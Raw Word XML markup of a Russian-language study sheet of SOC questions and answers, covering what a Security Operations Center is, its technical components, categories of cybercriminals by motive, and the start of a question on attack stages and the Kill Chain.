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A6C6" w14:textId="189A33A3" w:rsidR="00DF5BDA" w:rsidRDefault="00DF5BDA" w:rsidP="00DF5BDA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001436D7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Задания  </w:t>
      </w:r>
      <w:r w:rsidRPr="001436D7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SOC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4520E8F9" w14:textId="77777777" w:rsidR="00DF5BDA" w:rsidRDefault="00DF5BDA" w:rsidP="00DF5BDA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A9679A4" w14:textId="0CB5A3F7" w:rsidR="00E04296" w:rsidRDefault="00E04296" w:rsidP="00755D9E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Что</w:t>
      </w:r>
      <w:r w:rsidRPr="00E04296">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>такое</w:t>
      </w:r>
      <w:r w:rsidRPr="00E04296">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Security Operation Center (SOC)</w:t>
      </w:r>
      <w:r w:rsidR="005A2DFE">
        <w:t xml:space="preserve"> и для чего он нужен</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C47D5F7" w14:textId="51FC2C8F" w:rsidR="004779BB" w:rsidRDefault="004779BB" w:rsidP="004779BB">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52464343" w14:textId="64115FC8" w:rsidR="004779BB" w:rsidRDefault="004779BB" w:rsidP="004779BB">
      <w:pPr>
        <w:ind w:firstLine="0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09946DC7" w14:textId="2FCFFA87" w:rsidR="004779BB" w:rsidRPr="004779BB" w:rsidRDefault="00B571E8" w:rsidP="004779BB">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00020D2E">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004779BB" w:rsidRPr="00ED28B5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Центр управления безопасностью</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED28B5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED28B5">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SOC</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED28B5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="004779BB" w:rsidRPr="004779BB">
        <w:t xml:space="preserve"> – это </w:t>
      </w:r>
      <w:r w:rsidR="002024DC" w:rsidRPr="002024DC">
        <w:t>струк</w:t>
      </w:r>
      <w:r w:rsidR="002024DC">
        <w:t>турное подразделение компании</w:t>
      </w:r>
      <w:r w:rsidR="004779BB" w:rsidRPr="004779BB">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="002024DC">
        <w:t>занимающееся постоянным мониторингом и улучшением</w:t>
      </w:r>
      <w:r w:rsidR="004779BB" w:rsidRPr="004779BB">
        <w:t xml:space="preserve"> состояния безопасности организации, одновременно предотвращая, обнаруживая, анализируя и реагируя на инциденты кибербезопасности.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D0E04A" w14:textId="0BE10151" w:rsidR="004779BB" w:rsidRPr="004779BB" w:rsidRDefault="004779BB" w:rsidP="004779BB">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="004779BB">
        <w:t>#####################################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C5529C" w14:textId="7D3D7ECE" w:rsidR="00B735FA" w:rsidRDefault="00B735FA" w:rsidP="00755D9E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Какие технические компоненты </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SOC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> вы можете назвать</w:t>
      </w:r>
      <w:r w:rsidR="00537B67">
        <w:t>?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Опиши</w:t>
      </w:r>
      <w:r w:rsidR="00537B67">
        <w:t>те</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> их функции?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B36AB8F" w14:textId="680FEB97" w:rsidR="00B571E8" w:rsidRDefault="00B571E8" w:rsidP="00B571E8">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="080AF1F9" w14:textId="77777777" w:rsidR="00B571E8" w:rsidRPr="00B571E8" w:rsidRDefault="00B571E8" w:rsidP="00B571E8">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>Ответ</w:t>
      </w:r>
      <w:r w:rsidRPr="00B571E8">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3283E904" w14:textId="77EEDF83" w:rsidR="00B571E8" w:rsidRDefault="00B571E8" w:rsidP="00B571E8">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00B571E8">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00ED28B5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Система управления информа</w:t>
      </w:r>
      <w:r w:rsidR="00020D2E" w:rsidRPr="00ED28B5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ционной безопасностью (SIEM)</w:t>
      </w:r>
      <w:r w:rsidR="00020D2E">
        <w:t xml:space="preserve"> – э</w:t>
      </w:r>
      <w:r>
        <w:t>та система</w:t>
      </w:r>
      <w:r w:rsidR="00020D2E">
        <w:t>, которая</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> позволяет анализировать большие объемы данных из различных источников в реальном времени для выявления аномалий, которые могут указывать на наличие угроз безопасности. SIE</w:t>
      </w:r>
      <w:r w:rsidR="00020D2E">
        <w:t xml:space="preserve">M может автоматически собирать </w:t>
      </w:r>
      <w:r>
        <w:t>и анализировать журналы событий ИТ-систем и оборудования для обнаружения подозрительной активности.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098F0B55" w14:textId="77777777" w:rsidR="00B571E8" w:rsidRDefault="00B571E8" w:rsidP="00B571E8">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FB27D4A" w14:textId="73DBEA42" w:rsidR="00B571E8" w:rsidRDefault="00B571E8" w:rsidP="00B571E8">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00ED28B5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Средства обнаружения вторжений (IDS)/Системы предотвращения втор</w:t>
      </w:r>
      <w:r w:rsidR="00020D2E" w:rsidRPr="00ED28B5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>жений (IPS)</w:t>
      </w:r>
      <w:r w:rsidR="00020D2E">
        <w:t xml:space="preserve"> – э</w:t>
      </w:r>
      <w:r>
        <w:t>ти инструменты обнаруживают подозрительные паттерны активности, которые могут указывать на атаку, и могут действовать для предотвращения реализации угрозы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7D6FAE" w14:textId="77777777" w:rsidR="00B571E8" w:rsidRDefault="00B571E8" w:rsidP="00B571E8">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="203219FD" w14:textId="0187A14B" w:rsidR="00B571E8" w:rsidRDefault="00B571E8" w:rsidP="00B571E8">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00ED28B5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Антивирусное ПО</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00020D2E">
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r w:rsidR="006F27E0">
        <w:t xml:space="preserve"> о</w:t>
      </w:r>
      <w:r w:rsidR="00020D2E">
        <w:t>но предназначено</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для поиска и устранения вредоносного ПО на устройствах и в сети.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1BC618" w14:textId="77777777" w:rsidR="00B571E8" w:rsidRDefault="00B571E8" w:rsidP="00B571E8">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D8B4F9F" w14:textId="511C6188" w:rsidR="00B571E8" w:rsidRDefault="00020D2E" w:rsidP="00B571E8">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00ED28B5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Firewall (Межсетевой экран</w:t>
      </w:r>
      <w:r w:rsidR="00B571E8" w:rsidRPr="00ED28B5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00B571E8">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="006F27E0">
        <w:t>э</w:t>
      </w:r>
      <w:r>
        <w:t>то могут быть у</w:t>
      </w:r>
      <w:r w:rsidR="00B571E8">
        <w:t>стройства и программное обеспечение, которые контролируют входящий и исходящий сетевой трафик на основе заранее определенного набора правил безопасности.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147A7CDA" w14:textId="77777777" w:rsidR="00B571E8" w:rsidRDefault="00B571E8" w:rsidP="00B571E8">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A1474DD" w14:textId="73DA7562" w:rsidR="00B571E8" w:rsidRDefault="00B571E8" w:rsidP="00B571E8">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00ED28B5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Платформы защи</w:t>
      </w:r>
      <w:r w:rsidR="006F27E0" w:rsidRPr="00ED28B5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ты от распределенных атак типа «отказ в обслуживании»</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED28B5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> (DDoS) </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r w:rsidR="006F27E0">
        <w:t>это с</w:t>
      </w:r>
      <w:r>
        <w:t>истемы, способные смягчать эффекты масштабированных попыток заблокировать доступ к ресурсам организации путём перегрузки их трафиком.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD40891" w14:textId="77777777" w:rsidR="00B571E8" w:rsidRDefault="00B571E8" w:rsidP="00B571E8">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A598B0E" w14:textId="018A09E5" w:rsidR="00B571E8" w:rsidRDefault="00B571E8" w:rsidP="00B571E8">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00ED28B5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Средства шифрования и защиты данных (DLP)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="006F27E0">
        <w:t>они п</w:t>
      </w:r>
      <w:r>
        <w:t>озволяют контролировать и защищать данные на всех этапах их жизненного цикла, в том числе передачу данных внутри сети и в интернет.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D49184" w14:textId="79B97A51" w:rsidR="00B571E8" w:rsidRDefault="00B571E8" w:rsidP="00B571E8">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CDF480C" w14:textId="1210D22E" w:rsidR="00B571E8" w:rsidRDefault="00B571E8" w:rsidP="00B571E8">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00ED28B5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Системы управления конфигурацией</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="006F27E0">
        <w:t>они у</w:t>
      </w:r>
      <w:r>
        <w:t>правляют изменениями в конфигурациях систем и приложений, обеспечивая, чтобы все изменения были отслежены и одобрены.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDBDF0F" w14:textId="77777777" w:rsidR="00B571E8" w:rsidRDefault="00B571E8" w:rsidP="00B571E8">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26F19B6D" w14:textId="4EA3192A" w:rsidR="00B571E8" w:rsidRPr="004779BB" w:rsidRDefault="00B571E8" w:rsidP="00B571E8">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00ED28B5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Инструменты форензики</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:r w:rsidR="006F27E0">
        <w:t xml:space="preserve"> и</w:t>
      </w:r>
      <w:r>
        <w:t>спользуются для детального исследования и анализа данных после нарушения безопасности для определения причин инцидентов и способствуют идентификации уязвимостей.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CDED07" w14:textId="1DE46065" w:rsidR="00B571E8" w:rsidRPr="00B735FA" w:rsidRDefault="00B571E8" w:rsidP="00B571E8">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="004779BB">
        <w:t>#####################################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FEEFD5" w14:textId="1C760385" w:rsidR="00755D9E" w:rsidRDefault="00755D9E" w:rsidP="00755D9E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>На какие категории можно разделить киберпреступников (в зависимости от цели и мотивации)?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7671CAB2" w14:textId="067A1683" w:rsidR="00F14D8F" w:rsidRDefault="00F14D8F" w:rsidP="00F14D8F">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14BE5F35" w14:textId="0C32FF42" w:rsidR="00F14D8F" w:rsidRPr="00F14D8F" w:rsidRDefault="00F14D8F" w:rsidP="00F14D8F">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>Ответ</w:t>
      </w:r>
      <w:r w:rsidRPr="00F14D8F">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD3AE95" w14:textId="1A389C87" w:rsidR="00F14D8F" w:rsidRDefault="00F14D8F" w:rsidP="00F14D8F">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00ED28B5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Black Hat: криминальные хакеры</w:t>
      </w:r>
      <w:r w:rsidRPr="00F14D8F">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:t>они взламывают</w:t>
      </w:r>
      <w:r w:rsidRPr="00F14D8F">
        <w:t xml:space="preserve"> компьютерные системы</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> со злым или преступным умыслом, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F14D8F">
        <w:t xml:space="preserve">чтобы </w:t>
      </w:r>
      <w:r>
        <w:t>получить</w:t>
      </w:r>
      <w:r w:rsidRPr="00F14D8F">
        <w:t xml:space="preserve"> ф</w:t>
      </w:r>
      <w:r>
        <w:t>инансовую выгоду или достичь</w:t>
      </w:r>
      <w:r w:rsidRPr="00F14D8F">
        <w:t xml:space="preserve"> других вредоносных целей.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D9A40A" w14:textId="2076C191" w:rsidR="00F14D8F" w:rsidRDefault="00F14D8F" w:rsidP="00F14D8F">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06EC986B" w14:textId="1DBF2FF6" w:rsidR="00F14D8F" w:rsidRDefault="00ED28B5" w:rsidP="00F14D8F">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00ED28B5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Grey Hat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – хакеры, которые находят</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED28B5">
        <w:t xml:space="preserve"> способы взлома компьютерных сетей и систем, но без злого умысла, который и</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">меется у хакеров типа black hat, а </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED28B5">
        <w:t>для удовольствия</w:t>
      </w:r>
      <w:r>
        <w:t>. О</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED28B5">
        <w:t xml:space="preserve">ни не всегда выбирают наиболее этичный путь при ведении своей </w:t>
      </w:r>
      <w:r>
        <w:t>деятельности –</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED28B5">
        <w:t xml:space="preserve"> могут проникать в системы или сети без разрешения владельца</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9FA3B1" w14:textId="6957A766" w:rsidR="00ED28B5" w:rsidRDefault="00ED28B5" w:rsidP="00F14D8F">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62BDD5AF" w14:textId="64D85036" w:rsidR="00ED28B5" w:rsidRDefault="00ED28B5" w:rsidP="00F14D8F">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00ED28B5">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED28B5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>cript kiddie</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED28B5">
        <w:t xml:space="preserve"> – хакеры-любители, которые не обладают таким уровнем навыков или знаний, как более продвинутые хакеры в этой области. </w:t>
      </w:r>
      <w:r>
        <w:t>Используют существующие вредоносные программы для нанесения вреда</w:t>
      </w:r>
      <w:r w:rsidR="007A267F">
        <w:t>. Они обычно мотивированы личными причинами –</w:t>
      </w:r>
      <w:r w:rsidR="007A267F" w:rsidRPr="007A267F">
        <w:t xml:space="preserve"> развлечься, создать хаос, привлечь внимание или отомстить.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BA95EA" w14:textId="72162552" w:rsidR="007A267F" w:rsidRDefault="007A267F" w:rsidP="00F14D8F">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56A2A988" w14:textId="75360E01" w:rsidR="007A267F" w:rsidRDefault="007C1156" w:rsidP="00F14D8F">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="007C1156">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Хакеры, спонсируемые государствами</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – они </w:t>
      </w:r>
      <w:r w:rsidRPr="007C1156">
        <w:t>назначаются правительством страны для получения доступа к комп</w:t>
      </w:r>
      <w:r>
        <w:t>ьютерным системам другой страны, с целью получения секретной информации.</w:t>
      </w:r>
      <w:r w:rsidRPr="007C1156">
        <w:t xml:space="preserve"> Хакеры этого типа нанимаются исключительно правительственными учреждениями.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C422CB" w14:textId="407784E9" w:rsidR="007C1156" w:rsidRDefault="007C1156" w:rsidP="00F14D8F">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4432BD34" w14:textId="0CA0D433" w:rsidR="007C1156" w:rsidRDefault="00EB15C8" w:rsidP="00F14D8F">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00EB15C8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Злонамеренный инсайдер: Хакеры-осведомители</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB15C8">
        <w:t xml:space="preserve">это люди, которые проводят кибер-атаку внутри организации, в которой они работают. </w:t>
      </w:r>
      <w:r>
        <w:t>И</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB15C8">
        <w:t>х мотивация для проведения атаки может варьироваться от действий по причине личной неприязни, которую он</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">и испытывают к своей компании </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB15C8">
        <w:t>или ее руководству, до поиска и разоблачения незаконной деятельности данной организации.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F95197" w14:textId="47BBD603" w:rsidR="00EB15C8" w:rsidRDefault="00EB15C8" w:rsidP="00F14D8F">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C0E07DC" w14:textId="7925AC99" w:rsidR="00EB15C8" w:rsidRDefault="00EB15C8" w:rsidP="00F14D8F">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00EB15C8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Криптоджекеры: Хакеры, занимающиеся майнингом криптовалют</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – о</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB15C8">
        <w:t>н</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">и распространяют вредоносное ПО </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB15C8">
        <w:t xml:space="preserve">различными способами, часто распространяя вирусы через Интернет. </w:t>
      </w:r>
      <w:r>
        <w:t>И</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB15C8">
        <w:t>х мотивом является не кража данных жертв, а использование их системы в качестве средства для майнинга криптовалют</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355B58DA" w14:textId="0C6C72FF" w:rsidR="00EB15C8" w:rsidRDefault="00EB15C8" w:rsidP="00F14D8F">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37846546" w14:textId="641D772F" w:rsidR="00EB15C8" w:rsidRDefault="00EB15C8" w:rsidP="00F14D8F">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00EB15C8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Игровые хакеры </w:t>
      </w:r>
      <w:r>
        <w:t>– они сосредотачивают</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB15C8">
        <w:t xml:space="preserve"> свои хакерские усилия на конкурентах в игровом мире.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Х</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB15C8">
        <w:t>акеры обычно проводят свои атаки в попытке украсть кредитные кэши конкурентов или вызвать распределенные DDoS-атаки, чтобы вывести их из игры.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59723F75" w14:textId="0EF94F3D" w:rsidR="00F6574E" w:rsidRDefault="00F6574E" w:rsidP="00F14D8F">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D618193" w14:textId="63520D25" w:rsidR="00F6574E" w:rsidRPr="00ED28B5" w:rsidRDefault="00F6574E" w:rsidP="00F14D8F">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00F6574E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Бот-сети (ботнеты): Крупномасштабные хакеры</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidRPr="00F6574E">
        <w:t>это разработчики вредоносных программ, которые создают огромные сети ботов для выполнения масштабных атак с максимально большого количества устройств</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F6574E">
        <w:t>Ботнеты могу</w:t>
      </w:r>
      <w:r>
        <w:t>т использоваться</w:t>
      </w:r>
      <w:r w:rsidRPr="00F6574E">
        <w:t xml:space="preserve"> хакером, который их создал, но они также часто доступны для покупки в </w:t>
      </w:r>
      <w:r>
        <w:t>Dark Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00F6574E">
        <w:t>, чтобы другие хакеры также могли воспользоваться ими за деньги.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D55482" w14:textId="6A88A54F" w:rsidR="00F14D8F" w:rsidRDefault="00F14D8F" w:rsidP="00F14D8F">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="004779BB">
        <w:t>#####################################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C438AF4" w14:textId="5CBCA6A1" w:rsidR="00755D9E" w:rsidRDefault="00755D9E" w:rsidP="00755D9E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>Назовите основные этап</w:t>
      </w:r>
      <w:r w:rsidR="00587ED5">
        <w:t>ы</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> атаки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5144F5" w14:textId="64CF3601" w:rsidR="00D2670E" w:rsidRDefault="00D2670E" w:rsidP="00D2670E">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C57BDBE" w14:textId="2C6920F8" w:rsidR="00D2670E" w:rsidRDefault="00D2670E" w:rsidP="00D2670E">
      <w:pPr>
        <w:ind w:firstLine="0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58228643" w14:textId="3CD8400C" w:rsidR="00D2670E" w:rsidRDefault="00D2670E" w:rsidP="00D2670E">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00395645">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00D2670E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kill</w:t>
      </w:r>
      <w:r w:rsidRPr="00D2670E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D2670E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Chain</w:t>
      </w:r>
      <w:r w:rsidRPr="00D2670E">
        <w:t xml:space="preserve"> предназначена для защиты от сложных кибера</w:t>
      </w:r>
      <w:r w:rsidR="005604B7">
        <w:t>так, также известных как</w:t>
      </w:r>
      <w:r w:rsidRPr="00D2670E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005604B7" w:rsidRPr="005604B7">
        <w:t>продвинутые постоянные угрозы</w:t>
      </w:r>
      <w:r w:rsidRPr="00D2670E">
        <w:t xml:space="preserve"> (APT</w:t>
      </w:r>
      <w:r w:rsidR="005604B7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00D2670E">
        <w:t>), при которых злоумышленники тратят значительное время на наблюдение и планирование атаки.</w:t>
      </w:r>
